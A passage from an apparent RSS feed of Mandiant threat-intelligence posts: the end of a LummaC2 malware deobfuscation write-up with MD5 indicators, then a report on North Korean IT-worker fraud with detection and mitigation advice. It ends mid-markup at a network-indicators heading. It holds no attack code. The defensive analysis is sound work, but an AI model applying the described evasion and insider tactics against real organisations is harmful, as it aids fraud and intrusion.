style="vertical-align: baseline;">Offset Relocation</span></h3> <p><span style="vertical-align: baseline;">The final step, relocation, addresses a remnant from our rebuilding process. As we remove dispatcher instructions and duplicated instructions, the rewritten instructions will occupy different locations from where they were in the original function. This displacement throws off the offsets of jump, call, and other memory-referencing instructions that are not position-independent, as they now need to refer to memory locations from their new addresses.</span></p> <p><span style="vertical-align: baseline;">In our current implementation, we address this by parsing all of the memory-referencing instructions and calculating their correct offsets after deobfuscation. This involves tracking both the original and relocated addresses of each instruction. With this information, we can calculate the adjusted offset to reach the target memory reference and craft the correct opcode for each instruction.</span></p> <h2><span style="vertical-align: baseline;">Final Result</span></h2> <p><span style="vertical-align: baseline;">By employing techniques described in this blog post, we have successfully developed a deobfuscation tool for this version of LummaC2. In the following figures, we see the result of our deobfuscator lifting the protection from two protected functions in the case study sample.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/lummac2-obfuscation-fig21.max-1000x1000.png" alt="Disassembly view of the subroutine at the binary&#x27;s entrypoint before deobfuscation"> </a> <figcaption class="article-image__caption "><p data-block-key="8nnet">Figure 21: Disassembly view of the subroutine at the binary's entrypoint before deobfuscation</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/lummac2-obfuscation-fig22.max-1000x1000.png" alt="Decompiler view of the subroutine at the binary&#x27;s entrypoint after deobfuscation"> </a> <figcaption class="article-image__caption "><p data-block-key="8nnet">Figure 22: Decompiler view of the subroutine at the binary's entrypoint after deobfuscation</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/lummac2-obfuscation-fig23.max-1000x1000.png" alt="Disassembly view of the subroutine at address 0x41EE50 before deobfuscation"> </a> <figcaption class="article-image__caption "><p data-block-key="8nnet">Figure 23: Disassembly view of the subroutine at address 0x41EE50 before deobfuscation</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/lummac2-obfuscation-fig24.max-1000x1000.png" alt="Decompiler view of the subroutine at address 0x41EE50 after deobfuscation"> </a> <figcaption class="article-image__caption "><p data-block-key="8nnet">Figure 24: Decompiler view of the subroutine at address 0x41EE50 after deobfuscation</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">As shown in these figures, the original instructions are now readily apparent, free from the clutter of dispatcher blocks added by the obfuscator. The control flow, once obscured by indirect jumps, is now clearly visible and can be recovered and decompiled using IDA Pro. After deobfuscating all protected functions, we can now analyze the original program to comprehend its capabilities and behaviors.</span></p> <h2><span style="vertical-align: baseline;">Conclusion</span></h2> <p><span style="vertical-align: baseline;">In this blog post, we have explored the inner workings of LummaC2's obfuscation technique using indirect jumps to manipulate control flow. By leveraging backward slicing and symbolic execution, we have been able to consistently identify the original instructions and eliminate dispatcher instructions added by the obfuscator. Furthermore, we have discussed strategies for deobfuscation, including rebuilding the original function from the recovered control flow and addressing relocation challenges.</span></p> <p><span style="vertical-align: baseline;">While this blog post focuses on deobfuscating LummaC2 protected subroutines, the power of backward slicing as a binary analysis technique extends well beyond this specific case. We hope our exploration of deobfuscating LummaC2 through the use of backward slicing has provided valuable insights to fellow analysts tackling similar challenges in the ever-evolving realm of reverse engineering and malware analysis.</span></p> <h2><span style="vertical-align: baseline;">Indicators of Compromise</span></h2> <p><span style="vertical-align: baseline;">A </span><a href="https://www.virustotal.com/gui/collection/fde9be4abcbec24b6f5c47fb819c0d9adeb84e5113a4b5058142350ae58f7a95" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Threat Intelligence Collection</span></a><span style="vertical-align: baseline;"> featuring indicators of compromise (IOCs) related to the activity described in this post is now available.</span></p> <h3><span style="vertical-align: baseline;">Host-Based IOCs</span></h3></div> <div class="block-paragraph_advanced"><div align="center"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">MD5</strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">Associated Malware Family</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">d01e27462252c573f66a14bb03c09dd2</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">LUMMAC.V2</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">5099026603c86efbcf943449cd6df54a</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">LUMMAC.V2</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">205e45e123aea66d444feaba9a846748</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">LUMMAC.V2</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div></description><pubDate>Wed, 25 Sep 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/lummac2-obfuscation-through-indirect-control-flow/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>LummaC2: Obfuscation Through Indirect Control Flow</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/lummac2-obfuscation-through-indirect-control-flow/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>Staying a Step Ahead: Mitigating the DPRK IT Worker Threat</title><link>https://cloud.google.com/blog/topics/threat-intelligence/mitigating-dprk-it-worker-threat/</link><description><div class="block-paragraph_advanced"><p>Written by: <span style="vertical-align: baseline;">Codi Starks, Michael Barnhart, Taylor Long, Mike Lombardi, Joseph Pisano, Alice Revelli</span></p> <hr/></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Strategic Overview of IT Workers</span></h2> <p><span style="vertical-align: baseline;">Since 2022, Mandiant has tracked and reported on IT workers operating on behalf of the Democratic People's Republic of Korea (DPRK). These workers pose as non-North Korean nationals to gain employment with organizations across a wide range of industries</span><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">in order to </span><a href="https://ofac.treasury.gov/media/923126/download?inline" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">generate revenue for the North Korean regime</span></a><span style="vertical-align: baseline;">, </span><span style="vertical-align: baseline;">particularly to evade sanctions and fund its weapons of mass destruction (WMD) and ballistic missile programs.</span><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">A U.S. government </span><a href="https://ofac.treasury.gov/media/923126/download?inline" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">advisory</span></a><span style="vertical-align: baseline;"> in 2022 noted that these workers have also leveraged privileged access obtained through their employment in order to enable malicious cyber intrusions, an observation corroborated by Mandiant and </span><a href="https://blog.knowbe4.com/how-a-north-korean-fake-it-worker-tried-to-infiltrate-us" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">other organizations</span></a><span style="vertical-align: baseline;">.</span></p> <p><span style="vertical-align: baseline;">IT workers employ various methods for evading detection. We have observed the operators leverage </span><a href="https://www.justice.gov/opa/media/1320161/dl?inline" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">front companies</span></a><span style="vertical-align: baseline;"> to disguise their true identities; additionally, U.S. government </span><a href="https://www.justice.gov/usao-dc/pr/charges-and-seizures-brought-fraud-scheme-aimed-denying-revenue-workers-associated-north" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">indictments</span></a><span style="vertical-align: baseline;"> </span><a href="https://www.justice.gov/opa/pr/justice-department-disrupts-north-korean-remote-it-worker-fraud-schemes-through-charges-and" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">show</span></a><span style="vertical-align: baseline;"> that non-North Korean</span><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">individuals, known as “facilitators,” play a crucial role in enabling these IT workers in their efforts to seek and maintain employment. These individuals provide essential services that include, but are not limited to, laundering money and/or cryptocurrency, receiving and hosting company laptops at their residences, using stolen identities for employment verification, and accessing international financial systems. </span></p> <p><span style="vertical-align: baseline;">This report aims to increase awareness of the DPRK's efforts to obtain employment as IT workers and shed light on their operational tactics for obtaining employment and maintaining access to corporate systems. Understanding these methods can help organizations better detect these sorts of suspicious behaviors earlier in the hiring process. In this blog post we’ve included a sampling of the types of behaviors identified during our incident response engagements, and strategies for the detection and disruption of DPRK IT worker activity.</span></p> <h2><span style="vertical-align: baseline;">UNC5267</span></h2> <p><span style="vertical-align: baseline;">Mandiant tracks IT worker operations we have identified in various environments as UNC5267.</span><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">UNC5267 remains highly active in the present day, posing an ongoing threat. Some sources suggest that the origins of these operations can be traced back to 2018. Importantly, UNC5267 is not a traditional, centralized threat group. IT workers consist of individuals sent by the North Korean government to live primarily in China and Russia, with smaller numbers in Africa and Southeast Asia. Their mission is to secure lucrative jobs within Western companies, especially those in the U.S. tech sector.</span></p> <p><span style="vertical-align: baseline;">UNC5267 gains initial access through the use of stolen identities to apply for various positions or are brought in as a contractor. UNC5267 operators have primarily applied for positions that offer 100% remote work. Mandiant observed the operators engaging in work of varying complexity and difficulty spanning disparate fields and sectors. It is not uncommon for a DPRK IT worker to be working multiple jobs at once, pulling in multiple salaries on a monthly basis. One American facilitator working with the IT workers </span><a href="https://www.justice.gov/opa/pr/charges-and-seizures-brought-fraud-scheme-aimed-denying-revenue-workers-associated-north" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">compromised more than 60 identities</span></a><span style="vertical-align: baseline;"> of U.S. persons, impacted more than 300 U.S. companies, and resulted in at least $6.8 million of revenue to be generated for the overseas IT workers from in or around October 2020 until October 2023.</span></p> <p><span style="vertical-align: baseline;">UNC5267’s objectives include:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Financial gain through illicit salary withdrawals from compromised companies</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Maintaining long-term access to victim networks for potential future financial exploitation</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Potential use of access for espionage or disruptive activity (though this hasn't been definitively observed)</span></p> </li> </ul> <h2><span style="vertical-align: baseline;">Incident Response Observations</span></h2> <p><span style="vertical-align: baseline;">Mandiant's incident response engagements to date have primarily observed DPRK IT workers functioning within the scope of their job responsibilities. However, the remote workers often gain elevated access to modify code and administer network systems. This heightened level of access granted to fraudulent employees presents a significant security risk.</span></p> <p><span style="vertical-align: baseline;">Mandiant has identified a substantial number of DPRK IT worker resumes used to apply for remote positions. In one resume from a suspected IT worker, the email address<span style="vertical-align: baseline;">—</span>previously observed in IT worker-related activities<span style="vertical-align: baseline;">—</span>was also linked to a fabricated software engineer profile hosted on Netlify, a platform often used for quickly creating and deploying websites. The profile claimed proficiency in multiple programming languages and included fake testimonials with stolen images from high-ranking professionals, likely stolen from CEOs, directors, and other software engineers’ LinkedIn profiles. </span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/dprk-it-worker-fig1a.max-1000x1000.png" alt="Observed image of threat actor resume"> </a> <figcaption class="article-image__caption "><p data-block-key="nmflx">Figure 1: Observed image of threat actor resume (likely altered)</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Within the suspected DPRK IT worker's Netlify page, we discovered a resume accompanied by a link to another resume hosted on Google Docs, presenting a different identity. The linked resume featured a different name, phone number, and email address compared to the information on the Netlify page. Further discrepancies between the Netlify page and the linked resume included differing universities and years of attendance, as well as variations in past job titles and company work history. However, both of the resumes included a slight variation of the phrase “I'm less about seeing myself, I'm more about the others rely on me.”</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/dprk-it-worker-fig2a.max-1000x1000.png" alt="Resume excerpt"> </a> <figcaption class="article-image__caption "><p data-block-key="nmflx">Figure 2: Resume excerpt</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/dprk-it-worker-fig3.max-1000x1000.png" alt="Resume excerpt"> </a> <figcaption class="article-image__caption "><p data-block-key="nmflx">Figure 3: Resume excerpt</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">These two resumes are a small sampling of the total amount of fraudulent resumes identified by Mandiant. However, the resumes provide evidence of the DPRK IT workers utilizing multiple personas in attempts to gain employment across multiple organizations.</span></p> <p><span style="vertical-align: baseline;">A recurring characteristic of resumes utilized by UNC5267 is the use of addresses based in the United States coupled with education credentials from universities outside of North America, frequently in countries such as Singapore, Japan, or Hong Kong. While possible, Mandiant noted that the acceptance rate for foreign students at many of the universities is low. This discrepancy may serve to hinder potential North American employers from verifying or contacting these overseas institutions regarding the applicant. Mandiant has also observed that the universities listed on the background check may not align with the candidate’s education background stated in their resume, including time of enrollment and completed degree programs. Furthermore, UNC5267's resumes often exhibit significant overlap with publicly available resumes or are heavily reused across multiple UNC5267 personas. </span></p> <p><span style="vertical-align: baseline;">To accomplish their duties, UNC5267 often remotely accesses victim company laptops situated within a laptop farm. These laptop farms are typically staffed with a single facilitator who is paid monthly to host numerous devices in one location. Mandiant has identified evidence that these laptops are often connected to an IP-based Keyboard Video Mouse (KVM) device, although a recurring theme across these incidents is the installation of multiple remote management tools on victim corporate laptops immediately following shipment to the farm. These indicate that the individual is connecting to their corporate system remotely via the internet, and may not be geographically located in the city, state, or even country in which they report to reside. The following is a list of remote administration tools identified during Mandiant engagements:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">GoToRemote / LogMeIn</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">GoToMeeting</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Chrome Remote Desktop </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">AnyDesk </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">TeamViewer</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">RustDesk</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Connections to these remote management solutions primarily originated from IP addresses associated with Astrill VPN, likely originating from China or North Korea. Lastly, feedback from team members and managers who spoke with Mandiant during investigations consistently highlighted behavior patterns, such as reluctance to engage in video communication and below-average work quality exhibited by the DPRK IT worker remotely operating the laptops. </span></p> <p><span style="vertical-align: baseline;">Another common characteristic identified across Mandiant’s engagements was that DPRK IT workers typically claimed to live in one location, but requested laptop shipment to another location (laptop farm or outside enablement entity). We have observed the DPRK IT workers using the location associated with the stolen identity used for employment, including the stolen driver’s license, which often doesn’t match the location where the laptop is ultimately shipped and stored. </span></p> <h2><span style="vertical-align: baseline;">Detection Methods</span></h2> <p><span style="vertical-align: baseline;">Mandiant highlights a number of strategies that organizations can use to identify and hinder DPRK IT worker operations based on information from trusted sources and </span><a href="https://ofac.treasury.gov/media/923131/download?inline" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">government</span></a><span style="vertical-align: baseline;"> </span><a href="https://www.ic3.gov/Media/Y2023/PSA231018" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">advisories</span></a><span style="vertical-align: baseline;">. Countering the threat posed by North Korean cyber actors requires a multifaceted approach that combines technical defenses, user awareness training, and proactive threat hunting. Key recommendations include:</span></p> <h3><span style="vertical-align: baseline;">Vetting of Job Candidates</span></h3> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Requiring stringent background checks, including the collection of biometric information for comparison against known identities via specialized background checking services, may deter the use of forgeries. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Implementing careful interview processes, such as requiring cameras to be used during interviews to ensure visual appearance matches online profiles, checking that the interviewee matches the provided identification, and asking questions to establish the consistency of a candidate's responses in line with their purported background. </span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">U.S. government advisories and trusted third parties have additionally noted IT workers’ reluctance to turn on cameras and their use of fake backgrounds during interviews. </span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Training human resources departments to spot inconsistencies broadly and learn IT worker tactics, techniques, and procedures ( TTPs).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Monitoring for the use of artificial intelligence (AI) to modify employment profile pictures.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Mandiant has observed multiple instances in which DPRK IT workers utilized AI to modify profile pictures. </span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Impacted organizations have leveraged open-source </span><a href="https://isitai.com/ai-image-detector/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">tooling</span></a><span style="vertical-align: baseline;"> to determine if the image was created using AI.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Require notarized proof of identity prior to employment.</span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Observations of Potential Technical Indicators</span></h3> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Verify phone numbers to identify Voice over Internet Protocol (VoIP) phone numbers. The use of VoIP phone numbers is a common tactic used by UNC5267. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Verify that the corporate laptop is shipped to and subsequently geolocated where the individual reports to reside during onboarding.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Mandiant has observed instances where the deployed corporate laptop was never geolocated in the location that the individual reported to reside.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Monitor and restrict the use and installation of remote administration tools:</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Prevent any remote connections to company-issued computers that could subsequently access the corporate network.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Monitor for uncommon remote admin tools. </span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Monitor for multiple remote admin tools installed on one system.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Monitor for the use of VPN services to connect to corporate infrastructure. IP addresses associated with VPN services, such as Astrill VPN, should be further reviewed.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Monitor for the use of “mouse jiggling” software. </span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Mandiant has observed instances of DPRK IT workers using the Caffeine mouse jiggling software to remain active across several laptops and profiles. This allows for ease of use at facilitator locations, where keeping laptops on and running are key and for the DPRK IT workers who often hold many jobs at once and need to appear online.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Request verification of the laptop serial number at the time of IT onboarding. This information should be readily available for anyone with physical possession of their corporate device. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Utilize a hardware based multi-factor for multi-factor authentication to enforce physical access to corporate devices.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"><span style="vertical-align: baseline;">Monitor and restrict the use of IP-based KVM devices. IP-based KVMs are frequently utilized by DPRK IT workers to maintain persistent remote access to corporate devices.</span></li> </ul> <h3><span style="vertical-align: baseline;">Ongoing Mitigation Strategies</span></h3> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Consider utilizing periodic mandatory spot checks where remote employees are required to go on camera. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Offer continuous education for users and employees on current threats and trends, which is critical for identifying potentially malicious activity. Provide additional training on reporting suspicious activity. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Collaborate with information-sharing communities and security vendors to stay abreast of the latest threats and mitigation strategies.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Require the use of U.S. banks for financial transactions to hinder IT worker efforts, as the acquisition of U.S. bank accounts is more difficult and entails stricter identity verification than those in many other countries. </span></p> </li> </ul> <p><span style="vertical-align: baseline;">For Google SecOps Enterprise+ customers, the IOCs listed in this blog post are available for prioritization with Applied Threat Intelligence.</span></p> <p><span style="vertical-align: baseline;">Mandiant also offers intelligence-led human-driven Custom Threat Hunt services to reveal ongoing or past threat actor activity in both cloud and on-premise environments. The service includes analysis tailored to the particulars of your tech stack and the threats targeting you. Learn more about <a href="https://services.google.com/fh/files/misc/custom_threat_hunt_datasheet.pdf" rel="noopener" target="_blank">Mandiant Custom Threat Hunt services</a>.</span></p> <h2><span style="vertical-align: baseline;">Outlook and Implications </span></h2> <p><span style="vertical-align: baseline;">North Korea's IT workforce, despite operating under significant constraints, presents a persistent and escalating cyber threat. The dual motivations behind their activities—fulfilling state objectives and pursuing personal financial gains—make them particularly dangerous. Their technical proficiency, coupled with sophisticated evasion tactics, poses a formidable challenge, especially for HR and recruiting teams tasked with identifying potential threats during the hiring process.</span></p> <p><span style="vertical-align: baseline;">Given their past successes and the DPRK regime's reliance on cyber operations for revenue and strategic goals, we anticipate a continued surge in sophisticated attacks and intrusions targeting businesses globally. The IT workers continue to be particularly impactful to Western organizations, with a growing number of European organizations targeted. These attacks can lead to data breaches, financial losses, intellectual property theft, and disruption of critical services.</span></p> <p><span style="vertical-align: baseline;">The activities of North Korea's IT workforce underscore the need for sustained vigilance and a proactive cybersecurity posture. While the threat is complex, a combination of robust security measures, employee awareness, and collaborative efforts can significantly enhance an organization's resilience against these malicious actors. Additionally, leveraging advanced threat detection tools and maintaining robust incident response plans are crucial for minimizing the impact of potential breaches. Collaboration with industry peers and cybersecurity agencies to share threat intelligence can further strengthen defenses against this evolving threat.</span></p> <p><span style="vertical-align: baseline;">Mandiant successfully operates in this effort by leveraging partnerships either publicly or privately with key organizations and victims alike. If your organization has been affected or you have information regarding DPRK cyber operations, we can help get the information to the people that need to be protected or informed. We are all in this together.</span></p> <p><span style="vertical-align: baseline;">A </span><a href="https://www.virustotal.com/gui/collection/633362a341322d562a22fc93b62fce69064bfa3ea8d5d15d112b2263a078a4ad" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Threat Intelligence Collection</span></a><span style="vertical-align: baseline;"> featuring indicators of compromise (IOCs) related to the activity described in this post is now available for registered users.</span></p> <h2><span style="vertical-align: baseline;">Network IOCs</span></h2></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: 